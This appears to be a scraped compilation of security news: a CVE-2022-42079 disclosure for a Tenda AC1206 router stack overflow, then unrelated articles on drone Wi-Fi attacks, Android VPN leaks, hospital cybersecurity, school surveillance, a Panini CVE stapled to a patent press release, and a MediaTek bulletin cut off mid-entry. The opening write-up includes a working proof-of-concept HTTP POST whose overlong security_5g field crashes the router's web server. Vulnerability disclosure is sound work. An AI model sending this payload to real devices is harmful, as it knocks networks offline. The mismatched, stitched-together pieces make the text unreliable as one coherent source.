Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiBasicSet page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **formWifiBasicSet**.

User control pointer parameter _**security\_5g**_ in web requesting; _**param\_5g**_ is an array on the stack, and using strcpy to copy _**security\_5g**_ to _**param\_5g**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/WifiBasicSet HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=rjy5gk
Connection: close
Content\-Length: 3660

security\_5g\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42079: myCVE/AC1206-3.md at main · tianhui999/myCVE

Drone-based cyberattacks to spy on corporate targets are no longer hypothetical, one incident from this summer shows.

Once limited to abstract academic conversation among cybersecurity enthusiasts, drones loaded with cyber-spying equipment are now being used in the real world to breach networks and steal information.

Cybersecurity researcher Greg Linares shared a Twitter thread on Oct. 10 providing an overview of a drone-based cyberattack he was privy to over the summer.

He explained it started when an unnamed financial company picked up unusual traffic on its network. A trace of the Wi-Fi signal behind the network activity led the threat hunters to the roof, where two drones were found. One was a modified DJI Phantom carrying what Linares called a "modified Wifi Pineapple device"; the other was a likewise modified DJI Matrice 600 drone loaded with "a Raspberry Pi, batteries, a GPD mini laptop, a 4G modem and another Wi-Fi device," he added.

The cyberattack was partially successful, allowing attackers to target the internal Atlassian Confluence page to get access to credentials and other devices, Linares said. However, the threat hunters found one of the drones damaged, but still functioning.

"The attack was a limited success, and it appears that once the attackers were discovered, they accidentally crashed the drone on recovery," Linares tweeted.

He explained this sort of drone exploit delivery attack probably cost no more than $15,000 to put together.

"Attackers are spending this range of budget in order to target your internal devices and are ok with burning it," he cautioned. "This is the third real-world drone based attack I have encountered in two years."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Airborne Drones Are Dropping Cyber-Spy Exploits in the Wild

The platform lets network connectivity data escape outside of the secure tunnel when connected to a public network, posing a "privacy concern" for users with "certain threat models," researchers said.

Android devices are leaking certain traffic when a mobile device is connected to a Wi-Fi network, even when features aimed to protect data being sent over the public Internet by using virtual private networks (VPNs) are enabled.

The issue could poke a hole in a user's ability to remain anonymous when using a VPN to encrypt data being sent from an Android device over a public Wi-Fi network, allowing a would-be attacker to monitor a user's traffic and even pinpoint someone's location, researchers noted.

A security audit conducted by Mullvad VPN identified the issue, which it reported to Google's Android team. It found that the Android mobile OS — which has nearly 3 billion users worldwide — is sending connectivity checks outside the VPN tunnel.

"It does this every time the device connects to a Wi-Fi network, even when the _Block connections without VPN_ setting is enabled," they wrote in the post. "The connection check traffic can be observed and analyzed by the party controlling the connectivity check server and any entity observing the network traffic.

This could allow a threat actor to derive information beyond merely the fact that the Android device is connected, such as a user's location if "combined with data such as Wi-Fi access point locations," the Mullvad researchers noted.

Android, for its part, says the function is working as intended, and that no fix is necessary.

**Defending Default Behavior**

It makes sense for Android to send connectivity data traffic by default, the Mullvad researchers acknowledged, such as when there is a captive portal on the network, they said.

In this case, the connection will be unusable until the user has logged in to it, "so most users will want the captive portal check to happen and allow them to display and use the portal," the researchers wrote.

Still, as there seems to be no way to prevent Android from leaking traffic, the issue remains unresolved and potentially a risk for some users, the researchers said. Moreover, Android's current documentation about how the OS blocks connections without a VPN is misleading, they wrote, even if a user is "fine with some traffic going outside the VPN tunnel."

As it would require a "sophisticated actor" to use connectivity checks against someone using an Android phone, "most of our users are probably unlikely consider it a significant risk," the researchers acknowledged.

But the feature as currently documented by Android gives a user the impression "that no traffic will leave the phone except through the VPN" when the feature is turned on, which is not the case, the Mullvad researchers said.

Previously, on Sept. 29, Mullvad had posted on Android IssueTracker suggesting a change to the documentation regarding the "Block connections without VPN" feature to alert users to potential data leakage.

To remedy this issue, researchers suggested adding "except connectivity checks" to documentation references that claim the feature allows people using a device or an IT admin to force all traffic to use the VPN, or blocks any network traffic that doesn't use the VPN for clarification. The issue remains pending.

Dark Reading has reached out to Android for comment.

**Connection Checks Working as Intended**

The researchers reported the mobile system's actual leaking of connectivity data to Android on its IssueTracker message board site. Android responded quickly that it was looking into it.

A Google engineer later defended the current state of the "Block connections without VPN" feature, responding that the status of the issue is "Won't Fix" as "this is working as intended" in a comment posted Oct. 6.

The engineer stated four reasons for declining to add an option in Android to disable connectivity checks. One is that the VPN might be actually relying on the result of these connectivity checks, while another is that the VPN may be a split tunnel, letting part of the traffic over the underlying network, or only affect a given set of apps.

Further, the connectivity checks are far from the only thing exempted from the VPN, as privileged apps can also bypass the VPN, and this is necessary for their operation in many cases, the engineered stated.

Finally, Google's position is that it's unclear as to what specific impact on privacy the issue has, as "connectivity checks reveal there is an Android device at this address, which is plenty clear from the L2 connection and from the traffic going over the VPN anyway," according to the engineer.

**High-Profile Risk**

Mullvad's point that the leak could pose a threat to some users certainly has validity, especially given the increased interest by state-sponsored threat actors to use spyware and other ways to monitor and even persecute high-profile Android users such as journalists, activists, academics, and politicians.

VPNs are meant to ensure that network connections using them encrypt Internet traffic over public networks, meaning that they use the IP address of a designated VPN service rather than someone's public IP address. This allows high-risk users who know they need extra security when their devices are connected to public Wi-Fi networks to hide their activity from prying eyes.

Mullvad acknowledged that there is nothing that the company or anyone else can do to fix the Android leaks if Google doesn't take action to change the OS.

However, there is one Android-based distribution, GrapheneOS, that gives users the option to disable connectivity checks within the mobile OS, the researchers said. With this feature enabled in devices using the distribution, Mullvad researchers said they could not observe the connections.

In light of this, the researchers reiterated their position that Google consider adopting this same ability to disable connectivity checks into stock Android, they concluded in their post.

Android Leaks Wi-Fi Traffic Even When VPN Protection Features Are On

By Owais Sultan
Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and…
This is a post from HackRead.com Read the original post: Cybersecurity Threats to Health Services: Why We Should Be Concerned

Hospitals and medical facilities are lucrative targets for hackers. It’s not enough anymore to keep software updated and make backups once a week. Instead, hospitals should ask questions like: “what is a VPN” and “what does a VPN do” to kick-start their journey to safer patient data.

Would you enjoy hearing about your most intimate medical issues on the evening news? It’s already happening. It will keep happening until hospitals, and medical service providers stop underestimating the cybersecurity threat landscape.

The statistics and news headlines are clear: hospitals and medical facilities are choice targets for hackers. Patients are starting to demand that medical services providers do everything they can to keep personal data safe.

Hospitals should be googling questions like “VPN meaning” and “what does a VPN do” to kick start their journey to safer patient data and privacy.

**Why do hackers target hospitals?**

The healthcare industry is highly vulnerable at five pressure points. Hackers know this. They design their attacks to push these buttons to get rapid economic rewards:

1.  A shutdown of medical appliances could kill patients and delay urgent medical  
    Treatment.  
    
2.  The loss of patient medical history could delay the treatment of medical  
    Conditions.  
    
3.  Public backlash and loss of patients’ trust.  
    
4.  The possibility of facing federal and criminal investigations and fines or  
    sanctions. Some medical providers are not equipped to install better security  
    controls, but many simply underestimate the risks.  
    
5.  Hackers can make quick cash from selling Personal Health Information (PHI),  
    which is worth more than ‘ordinary’ Personally Identifiable Information (PII).  
    You can change your credit card or even SSN, but you can’t change your  
    medical history of illnesses, treatments, or surgeries.

According to our sources, Credit cards and related information sell for $1-$2 on the dark web, but PHI can sell for more than $350. Hackers use these detailed medical records to falsify insurance claims, buy high-value drugs, or get medical procedures. 

**How do hackers threaten healthcare services?**

Most of the healthcare industry’s cybersecurity woes start with the weakest link: phishing attacks aimed at everyday workers.

**Phishing**

The first step to ransomware attacks and data breaches is to gain access to an employee’s login credentials. And they do this by carrying out phishing attacks. Cybercriminals bombard mailboxes with unsuspecting emails that contain malicious attachments or links that can download malware or steal login credentials.

They often use the hacked account of one employee to work their way up to someone in the organization that has access to the entire IT system.

**Data breaches**

A careless or overburdened employee may unintentionally click on a malicious link or even lose a device. In today’s work-from-everywhere environment, hackers can steal user credentials if an employee logs into the hospital’s system via a home or public Wi-Fi link without the protection of a virtual private network (VPN).

Once hackers gain access to a system, they can download patients’ healthcare and financial information, steal proprietary research, infiltrate the company’s finance system, divert funds or medical equipment and drugs, or even shut down the entire operation.

**Ransomware attacks**

A ransomware infection locks down your files and system and makes it completely inaccessible. The attacker then demands a ransom to unlock the files. The healthcare industry is particularly vulnerable to this type of attack because ransomware attacks can bring medical services to a complete halt. Medical emergencies can’t wait. The urgency of this situation sometimes forces hospitals to pay the ransom despite the FBI’s advice to the contrary.

**DDoS Attacks**

A Distributed-Denial-of-Service attack (DDoS attack) is when hackers bombard a targeted server with fake connection requests to overwhelm and force the server offline. DDoS attacks can bring every operation in a hospital to an abrupt halt and could even put lives at risk. The criminals usually demand a ransom to stop the attack.

**How can hospitals protect themselves?**

Cyberattacks on hospitals can halt clinical procedures, threaten the quality of patient care, and result in very serious data breaches. Clearly, standard security advice is not good enough. Hospitals should adopt a structured plan to invest in cybersecurity to defend their electronic infrastructure.

**Address the weakest link with cybersecurity Awareness training**

Train staff to view electronic communications as a potential attack surface. Cyber Threat Awareness programs can help to protect staff from phishing attacks and social engineering attempts.

**Enforce Password Security**

In a hospital’s high-pressure environment where staff often share devices and machines, users should have access to a sophisticated password management system to keep unauthorized users out.

**Install a Multi-Factor Authentication system**

Multi-Factor Authentication (MFA) is a secure, simple access control measure that could thwart most hacking attempts.

**Migrate to Ultra-Secure Cloud Computing**

Cloud computing is reliable, cheap, and easy to put in place, especially if outsourced. Reputable cloud storage providers meet HIPAA minimum requirements and can be tailored to meet specific storage and access control needs.

**Enforce data encryption**

Criminals can hijack unencrypted data flying between storage and endpoint terminals. All data should be protected from input to the endpoint. A VPN can encrypt everything that enters and leaves a hospital’s digital system so that hackers can’t decipher the contents.

**What is a VPN, and what does it do?**

VPN technology creates a secure, private tunnel to pass data between, for example, your computer or mobile device and the hospital system’s storage device. It encrypts everything by turning it into an unreadable, useless data salad.

That private communication tunnel protects the data from prying eyes, and the encryption makes the data useless, even if someone manages to intercept it.

**What can a VPN do for hospitals?**

A VPN is critical to data protection, especially under HIPAA rules. A VPN can encrypt data, block unauthorized access, protect IoT equipment and IoT endpoints, block malware, improve email filtering and ensure that patient data remains protected during transit.

**Conclusion**

Hospitals and other health service providers are prime cybercrime targets. At the same time, HIPAA requires that they put in place a range of measures to protect patient data. It’s a tall and challenging order.

Fortunately, digital tools offer extraordinary solutions and safety features, and data encryption is a good place to start. You can use a VPN on iPhone, Android, all Windows and Linux devices, and all IoT devices like monitors, cameras, alarm systems, and other smart tech devices across the entire organization.

Cybersecurity Threats to Health Services: Why We Should Be Concerned

Colleges and K-12 campuses increasingly monitor student emails, social media, and more. Here’s how to secure your (or your child’s) privacy.

There are more eyes on students today than just a teacher’s watchful gaze. Thousands of school districts use monitoring software that can track students’ online searches, scan their emails, and in some cases, send alerts of perceived threats to law enforcement. A recent investigation by _The Dallas Morning News_ revealed that colleges have been using an AI social-media-monitoring tool to surveil student protesters.

While technology companies claim to be able to prevent violence, there’s little proof that surveillance can actually protect students. Meanwhile, monitoring software has been used to eveal students' sexuality without their consent. Low-income, Black, and Hispanic students are also disproportionately exposed to surveillance and discipline.

If your school (or your child’s school) uses monitoring software, there are a couple of steps you can take to protect your privacy—and start a conversation with your school.

Ask Your School These Questions

It’s important first to understand why your school is using monitoring software in the first place. In the US, schools _are_ required by the Children’s Internet Protection Act to have some kind of web filtering in place to prevent students from accessing obscene or harmful material online. Schools are _not_ required to implement sophisticated technologies that can scan the content of students’ emails and send alerts to police.

Next, find out your specific school’s exact monitoring practices. “A lot of these student activity monitoring tools are different. You don’t actually know the full scope of what it is until you’re able to have a conversation with someone,” says Marika Pfefferkorn, cofounder of the Twin Cities Innovation Alliance and executive director of the Midwest Center for School Transformation. Pfefferkorn also helps to lead the No Data About Us Without Us Institute, where she works to educate parents and students about data, privacy, and equity issues in their school district.

She suggests starting with a trusted teacher or counselor. If they don’t know specifics, or don’t have any documentation to answer your questions, that can be a red flag—and an indication that you may need to approach school or district leadership.

Here are some questions you can ask:

*   What software is being used? Does it operate on school devices, over the school Wi-Fi network, or both?
*   If it’s student monitoring software, what kind of information does the algorithm scan for? If the algorithm detects a “threat” or “inappropriate content,” who does the alert go to? At what point does content get flagged to a third party, such as law enforcement?
*   How is student data secured?
*   Where can students and parents report violations of privacy in the district? What processes does the district have to repair harm?
*   How much of the budget is used for surveillance technology?

Pfefferkorn also encourages asking your school to perform an audit of its monitoring software, which could reveal what kind of content the algorithm is tracking and how. An audit might reveal whether the software is truly effective or is picking up on false alarms. Encourage your school to document and inform parents of exactly what they track, how they store, and when they delete student data. Ask if you can have your child’s data deleted, or at least see what has been collected.

Act Like You’re Being Watched, Even After School

Whether you’re using your phone on your school’s Wi-Fi, or you’re using a school laptop at home, assume that everything you do is being scanned and logged by monitoring software. Did you plug in your personal phone to your school laptop? The photos on your phone might be scanned too.  Nude photos sent from students’ personal phones, if plugged into school devices to charge, have triggered alerts to school administrators.

“You should assume that anything touching your school-issued device is going to be monitored in some way,” says Jason Kelley, associate director of digital strategy at the nonprofit Electronic Frontier Foundation. Monitoring doesn’t stop after school or off-campus either.

If you’re a student, practice the basics of digital privacy. Don’t use your school laptop or Wi-Fi to search for anything sensitive, such as medical information. Remember that any kind of data or content on a school communications platform can be scanned and flagged: your school email address, the documents you type into your school Google Drive, your online searches, the images you download, the videos you watch. Even content that is completely safe might be flagged by the algorithm: For example, the software Gaggle can flag keywords related to LGBTQ identity such as ”gay” and “queer” as instances of bullying.

Even if you trust a handful of teachers or counselors, remember that your activity could be seen by other adults in the school, or even law enforcement. Don’t do anything on your device that you wouldn’t want them to see as well.

Others might advise students to “just use your personal device, on your family’s personal network.” It’s important to note that this kind of guidance isn’t accessible to all students. For low-income students, who might rely more on school technology, it may be more difficult to sidestep a school’s surveillance structures.

Mind Your Social Media

Schools might also use AI tools to track social media posts. This is particularly relevant for college students. While colleges generally don’t use content monitoring software, it’s likely they’ll monitor students’ social media for potential risk of violence or protest.

Just as you would assume that anything you type on your school-issued device can be seen and scanned by an algorithm, assume that your public social profiles can be, too. Even private accounts aren’t completely safe, says Kelley. (Yes, even your super-locked-down Finsta.) If you comment on a public account, for example, that might be scanned and subjected to social-media-monitoring algorithms as well.

If you’re in doubt, send text messages rather than using a social media platform. You might consider using an encrypted messaging app like Signal. If you’re discussing topics that might be more sensitive (such as reproductive rights access), the safest way to communicate is with a trusted person, in person.

Team Up With Other Students and Parents

After gathering your research, you might feel that your school isn’t using monitoring software fairly or appropriately. Pfefferkorn recommends having conversations with other students and parents. Listen to what they’re experiencing and how they’re thinking through it, especially if you want to push back against your school’s use of monitoring software.

If you feel you need legal support, reach out to a local agency. Pfefferkorn recommends your local ACLU, NAACP, or Restore the Fourth as good options for advocacy assistance.

Your school’s response will depend on whether you go to a public or private school. For example, a public school might be required to disclose more information, for example, about how much it spends on monitoring software. A private school would not be obliged to give that same information. As another example, while public schools must abide by the recent ruling that room-scanning proctoring software is unconstitutional, private schools do not.

Now is a critical moment for students, parents, and communities to help shape the future of safety in schools, according to Pfefferkorn. Congress passed a law that directs $300 million for schools to strengthen security infrastructure, in addition to the funding to schools through the American Rescue Plan. She hopes that communities can be more involved in how schools invest that funding, and can help shape more proactive solutions. “It’s really critical right now for us to prioritize our values as a community of what safety means,” she says. “For me, safety is not being surveilled.”

How to Protect Yourself If Your School Uses Surveillance Tech

Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.

Panini, a global payments technology leader, officially announced that its Everest solution architecture that integrates computing platforms with check capture, was recently fully patented in the United States. This newly established approach is ground-breaking and further substantiates Panini as a visionary in payments technology.

Panini’s Everest unleashes the full power of Panini scanning platforms while dramatically removing the cost and complexity of integration, deployment and support for its customers and partners. Check scanning devices developed with this new technology can be used in different settings and even shared among users, making the move from Branch Image Capture (BIC) to Teller Image Capture (TIC) more attractive to financial institutions and aligning with the “bank of the future” trend of empowering roaming universal bankers in an open lobby environment. Not only will Everest offer more solution options for bank branches, but it will make Remote Deposit Capture (RDC) applications more flexible and easier to deploy and support: new devices like Panini’s EverneXt™ (up to 160 documents per minute) and mI:Deal™ (single feed) can easily be operated by a smart phone, tablet, or computer, with no need to download an API and keep it up-to-date over time. 

The Everest technology integrated into Panini scanning platforms enables the capture devices to be connected to any computing platform (such as tablets, PCs, smartphones, and POS terminals) via a choice of wired or wireless interfaces (Wi-Fi, Ethernet, USB), while replacing the traditional complexity of integration via API (application programming interface) with a state-of-the-art, secure HTTPS communications protocol. This architecture is the next decisive step in the evolution of Panini platforms designed to write the next chapter of paper-based payments dematerialization.

“Panini’s Everest-enabled intelligent scanning platforms open new possibilities for our customers and partners including on-board applications, shared devices, and untethered operation”, said Michael Pratt, Chief Executive Officer at Panini.

On October 4, 2016, the United States Patent and Trademark Office (USPTO) assigned Patent number 9,460,427 to the Everest technology, which builds on decades of Panini’s experience as a global leader in payments capture and displays yet another differentiator in the market. Panini thus continues to prove they operate as a dynamic and innovative organization delivering breakthrough, game-changing solutions.

**About Panini**  
Founded in Turin, Italy, Panini has enabled clients to capitalize on shifts in the global payments processing market for more than seventy years. Panini has a rich history of technology innovation, leveraging the company’s expertise in research & development. Panini’s market leading solutions are based on state-of-the-art engineering resources and ISO-9001 quality certified production. Panini offers check capture solutions that enable customers to fully realize the advantages and efficiencies available with the digital transformation of the paper check, resulting in the world’s largest deployed base of check capture systems, now approaching one million devices. Panini’s scalable check capture solutions address the complete range of distributed check processing opportunities including teller capture, back-counter capture, remote deposit capture, remittance processing and point-of-sale capture. The company provides solutions on a global basis, and has direct subsidiary operations in the United States covering North America and in Brazil covering Latin American markets. For more information visit: www.panini.com.

*   Português
*   Español
*   Italiano

CVE-2022-39959: Panini Patents Revolutionary New “Everest” Architecture

In vowe, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07138493; Issue ID: ALPS07138493.

**October 2022 Product Security Bulletin**

Published 2022-10-03

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and Wi-Fi chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-26471, CVE-2022-26472

Medium

CVE-2022-26452, CVE-2022-26473, CVE-2022-26474, CVE-2022-26475, CVE-2022-32589, CVE-2022-32590, CVE-2022-32591, CVE-2022-32592, CVE-2022-32593

****Details****

CVE

**CVE-2022-26471**

Title

Deserialization of untrusted data in telephony

Severity

High

Vulnerability Type

EoP

CWE

CWE-502 Deserialization of Untrusted Data

Description

In telephony, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6761, MT6765, MT6768, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8321, MT8385, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26472**

Title

Deserialization of untrusted data in ims

Severity

High

Vulnerability Type

EoP

CWE

CWE-502 Deserialization of Untrusted Data

Description

In ims, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8321, MT8385, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-26452**

Title

Improper synchronization in isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In isp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26473**

Title

Improper synchronization in vdec fmt

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In vdec fmt, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6789, MT6855, MT6879, MT6895, MT6983, MT8168, MT8365, MT8695, MT8696, MT8798

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26474**

Title

Incorrect calculation of buffer size in sensorhub

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-131 Incorrect Calculation of Buffer Size

Description

In sensorhub, there is a possible out of bounds write due to an incorrect calculation of buffer size. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6789, MT6855, MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26475**

Title

Improper input validation in wlan

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

